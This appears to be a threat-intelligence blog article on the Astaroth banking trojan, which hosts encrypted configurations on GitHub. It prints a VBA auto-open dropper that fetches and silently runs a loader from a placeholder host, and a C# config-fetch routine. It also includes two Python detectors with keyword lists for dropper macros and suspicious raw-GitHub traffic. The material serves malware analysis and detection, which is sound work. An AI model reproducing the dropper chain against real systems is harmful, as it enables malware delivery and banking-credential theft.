Astaroth Banking Malware Leveraging GitHub to Host Malware Configurations


A new wave of the Astaroth banking trojan has emerged, leveraging a novel approach to distribute its malicious configuration files.

First detected in late 2025, this latest campaign employs GitHub’s raw content service to host encrypted JSON configurations containing target URLs, browser injection parameters, and command-and-control (C2) endpoints.

By parking its settings behind GitHub’s trusted domain, Astaroth sidesteps reputation- and allow-list-based network controls: a request to raw.githubusercontent.com looks like the routine developer traffic most organizations already permit.

Delivery remains consistent with previous outbreaks, relying on spear-phishing emails that contain malicious Word documents outfitted with obfuscated macros and decoy content to dupe analysts.

Early victims report receiving emails purporting to be from financial institutions or corporate partners, often citing urgent invoice discrepancies.

Opening the attached document triggers a Visual Basic for Applications (VBA) macro that downloads a lightweight .NET loader from a remote site.


Once executed, the loader reaches out to GitHub’s raw content URLs to fetch the next-stage configuration, which is then decrypted in memory before spawning multiple threads for web injection and credential harvesting.

McAfee researchers noted that by using GitHub as a distribution point, the malware bypasses static allow-lists and hides in plain sight of endpoint protection platforms, significantly extending its window of operation.

Targeted primarily at European and North American banking customers, Astaroth’s impact includes unauthorized fund transfers, credential theft across multiple online banking portals and, in certain cases, lateral movement followed by ransomware deployment.

Advanced Configuration Management Through GitHub Infrastructure

Victims can remain unaware of the infection for weeks, as the malware employs both process hollowing and parent-child process masquerading to blend in with legitimate process trees and evade endpoint detection.

Files dropped to disk are minimal, and registry entries masquerade as legitimate Microsoft Office components, complicating forensic analysis for security teams.

Infection chain (Source – McAfee)

Delving into the infection mechanism reveals a sophisticated multi-stage process designed for stealth and reliability.

Upon opening the malicious Word document, the embedded macro executes the following sequence (the sample below uses a placeholder download URL):

Sub AutoOpen()
    Dim objHTTP As Object
    Dim objFSO As Object
    Dim objFile As Object
    Dim strURL As String
    Dim strTemp As String

    ' Stage 1: fetch the .NET loader from the attacker-controlled host (placeholder URL here)
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    strURL = "https://example.com/loader.exe"
    objHTTP.Open "GET", strURL, False
    objHTTP.Send

    ' Stage 2: drop the loader under %TEMP%. The original listing omitted the path
    ' separator, which would have produced "...\Templdr.exe" instead of "...\Temp\ldr.exe".
    strTemp = Environ("TEMP") & "\ldr.exe"
    If objHTTP.Status = 200 Then
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        ' Writing responseBody through a text stream corrupts a binary PE; a working
        ' dropper would use ADODB.Stream in binary mode. Kept as listed for fidelity.
        Set objFile = objFSO.CreateTextFile(strTemp, True)
        objFile.Write objHTTP.responseBody
        objFile.Close
        ' Stage 3: launch hidden (window style 0) without waiting for it to exit
        CreateObject("WScript.Shell").Run strTemp, 0, False
    End If
End Sub
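The macro above follows a recognisable dropper chain: an auto-execute entry point, an HTTP fetch, a write under %TEMP%, and a hidden process launch. The following is an added example, not code from the McAfee report or from the article, that scores extracted VBA source for exactly that chain. It first joins split string literals so that `"MSXML2." & "XMLHTTP"`-style obfuscation does not hide object names; the keyword lists and the three sample macros are this example's own assumptions, modelled on olevba-style triage.

```python
import re

# Indicator groups making up the dropper chain. Patterns are assumptions for this
# example, not indicators published for Astaroth.
INDICATORS = {
    "auto_exec": [r"\bAutoOpen\b", r"\bDocument_Open\b", r"\bWorkbook_Open\b", r"\bAutoExec\b"],
    "http_download": [r"MSXML2\.(Server)?XMLHTTP", r"WinHttp\.WinHttpRequest",
                      r"\.responseBody\b", r"URLDownloadToFile"],
    "file_write": [r"Scripting\.FileSystemObject", r"\.CreateTextFile\b",
                   r"ADODB\.Stream", r"\.SaveToFile\b"],
    "execute": [r"WScript\.Shell", r"\bShell\b\s*\(", r"\.Run\b", r"\.Exec\b"],
    "temp_path": [r'Environ\s*\(\s*"TEMP"\s*\)', r"%TEMP%"],
}

# The four stages that, together, constitute a download-and-execute dropper.
CHAIN = ("auto_exec", "http_download", "file_write", "execute")

# Constructed sample 1: the macro listed in the article (placeholder URL, as on the page).
DROPPER_MACRO = '''
Sub AutoOpen()
    Dim objHTTP As Object
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    objHTTP.Open "GET", "https://example.com/loader.exe", False
    objHTTP.Send
    strTemp = Environ("TEMP") & "\\ldr.exe"
    If objHTTP.Status = 200 Then
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile(strTemp, True)
        objFile.Write objHTTP.responseBody
        objFile.Close
        CreateObject("WScript.Shell").Run strTemp, 0, False
    End If
End Sub
'''

# Constructed sample 2: same chain, object names split across concatenated literals.
OBFUSCATED_MACRO = '''
Sub Document_Open()
    Set o = CreateObject("MSXML2." & "XMLHTTP")
    o.Open "GET", "https://example.com/x", False
    o.Send
    Set f = CreateObject("Scripting." & _
        "FileSystemObject")
    f.CreateTextFile(Environ("TEMP") & "\\x.exe", True).Write o.responseBody
    CreateObject("WScript." & "Shell").Run Environ("TEMP") & "\\x.exe", 0
End Sub
'''

# Constructed sample 3: an ordinary formatting macro with no dropper behaviour.
BENIGN_MACRO = '''
Sub FormatReport()
    Selection.Font.Bold = True
    ActiveDocument.Save
End Sub
'''


def normalize(vba):
    """Join adjacent string literals ("MSX" & "ML2") so split-string obfuscation cannot hide names."""
    return re.sub(r'"\s*&\s*(?:_\s*)?"', "", vba)


def match_indicators(vba):
    """Return {group: [matched patterns]} for every indicator group present in the macro."""
    text = normalize(vba)
    hits = {}
    for group, patterns in INDICATORS.items():
        found = [p for p in patterns if re.search(p, text, re.IGNORECASE)]
        if found:
            hits[group] = found
    return hits


def classify(vba):
    """Return (verdict, stages_present, hits): 'dropper' when the full chain is present."""
    hits = match_indicators(vba)
    stages = sum(1 for g in CHAIN if g in hits)
    if stages == len(CHAIN):
        verdict = "dropper"
    elif stages >= 2:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return verdict, stages, hits


if __name__ == "__main__":
    for name, macro in (("listed", DROPPER_MACRO), ("split-strings", OBFUSCATED_MACRO),
                        ("benign", BENIGN_MACRO)):
        verdict, stages, hits = classify(macro)
        print(f"{name:14s} -> {verdict} ({stages}/{len(CHAIN)} stages; groups: {sorted(hits)})")
```

Feed it the output of a macro extractor such as olevba; a "dropper" verdict on a document that arrived by e-mail is worth an immediate look even before the download URL is known.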

Once ldr.exe executes, it invokes a .NET routine along the following lines to fetch and decrypt the GitHub-hosted configuration (the repository path is a placeholder and the cipher behind DecryptConfig is not disclosed in the report):

using System;
using System.Net;
using System.Text;

// Pulls the encrypted configuration blob from GitHub's raw content host and decrypts
// it in memory; nothing is written to disk. The key is assumed to be embedded in the loader.
static string FetchConfig(byte[] key)
{
    var url = "https://raw.githubusercontent.com/user/repo/main/config.dat";
    using var wc = new WebClient();              // sends no User-Agent header unless one is set
    byte[] data = wc.DownloadData(url);          // plain HTTPS GET to a trusted domain
    byte[] decrypted = DecryptConfig(data, key); // cipher not disclosed in the report
    return Encoding.UTF8.GetString(decrypted);   // JSON: target URLs, injection parameters, C2 endpoints
}

This mechanism illustrates Astaroth’s reliance on legitimate infrastructure to obscure malicious intent, leaving network defenders unable to separate benign from malicious traffic on destination alone.

Continuous monitoring of raw GitHub content access from endpoints with no development role is therefore recommended as a key detection strategy: the destination is legitimate, so the signal has to come from who is fetching, how often, and with what client.
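One way to turn that recommendation into detection logic, as an added example that is not part of the article or the McAfee report: the script below parses web-proxy lines, keeps only requests to raw.githubusercontent.com, and scores each (source host, URL) pair on four assumed heuristics: the host is not a known developer endpoint, the User-Agent is empty or not browser/git-like, the fetched file has an opaque payload-style extension, and the same URL is fetched repeatedly. The log format, the allow-list, the User-Agent prefixes and the sample lines are all constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

RAW_HOST = "raw.githubusercontent.com"

# Endpoints expected to pull from GitHub (constructed allow-list for this example).
DEV_HOSTS = {"dev-ws-01", "build-agent-02"}

# User-Agent prefixes sent by browsers and common developer tooling (assumed list).
BENIGN_UA_PREFIXES = ("Mozilla/", "git/", "curl/", "pip/", "npm/", "Go-http-client/")

# Extensions a loader is likely to fetch as an opaque blob (heuristic, not an Astaroth IOC).
PAYLOAD_EXTENSIONS = (".dat", ".bin", ".enc")

# Assumed proxy line format: <ts> <src_host> <user> "<METHOD> <url>" <status> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<host>\S+) (?P<user>\S+) '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)" (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

# Constructed sample lines: a developer pulling a script, a finance workstation polling
# a .dat blob with no User-Agent (what an unconfigured .NET WebClient produces), an HR
# machine reading a README in a browser, an unrelated API call, and one malformed line.
SAMPLE_LOGS = [
    '2025-11-03T09:12:01Z dev-ws-01 alice "GET https://raw.githubusercontent.com/acme/tooling/main/setup.sh" 200 "git/2.43.0"',
    '2025-11-03T09:12:05Z fin-pc-17 bob "GET https://raw.githubusercontent.com/user/repo/main/config.dat" 200 ""',
    '2025-11-03T09:14:22Z hr-pc-03 carol "GET https://raw.githubusercontent.com/acme/docs/main/README.md" 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '2025-11-03T09:27:05Z fin-pc-17 bob "GET https://raw.githubusercontent.com/user/repo/main/config.dat" 200 ""',
    '2025-11-03T09:30:00Z fin-pc-17 bob "GET https://api.github.com/repos/user/repo" 200 ""',
    'garbage line that does not match the format',
]


def parse_line(line):
    """Return the fields of one proxy line, or None if it does not match the assumed format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def raw_github_requests(lines):
    """Yield parsed requests whose destination is GitHub's raw content host."""
    for line in lines:
        rec = parse_line(line)
        if rec is not None and urlparse(rec["url"]).hostname == RAW_HOST:
            yield rec


def analyze(lines):
    """Score raw-content fetches; return one finding per (host, url), highest severity first."""
    grouped = defaultdict(list)
    for rec in raw_github_requests(lines):
        grouped[(rec["host"], rec["url"])].append(rec)

    findings = []
    for (host, url), recs in grouped.items():
        reasons = []
        if host not in DEV_HOSTS:
            reasons.append("source host is not a known developer endpoint")
        if any(not r["ua"] or not r["ua"].startswith(BENIGN_UA_PREFIXES) for r in recs):
            reasons.append("missing or non-browser/non-git User-Agent")
        if urlparse(url).path.lower().endswith(PAYLOAD_EXTENSIONS):
            reasons.append("opaque payload-like file extension")
        if len(recs) > 1:
            reasons.append(f"same URL fetched {len(recs)} times (polling)")
        if reasons:
            findings.append({"host": host, "user": recs[0]["user"], "url": url,
                             "severity": len(reasons), "reasons": reasons})
    findings.sort(key=lambda f: f["severity"], reverse=True)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOGS):
        print(f"[{f['severity']}] {f['host']} ({f['user']}) -> {f['url']}")
        for reason in f["reasons"]:
            print("    -", reason)
```

A severity of one (an unexpected host reading a README through a browser) is a triage item; the finance workstation, which combines a non-developer host, an empty User-Agent, a .dat blob and repeated polling of one URL, is the pattern this campaign produces and should page someone.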


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.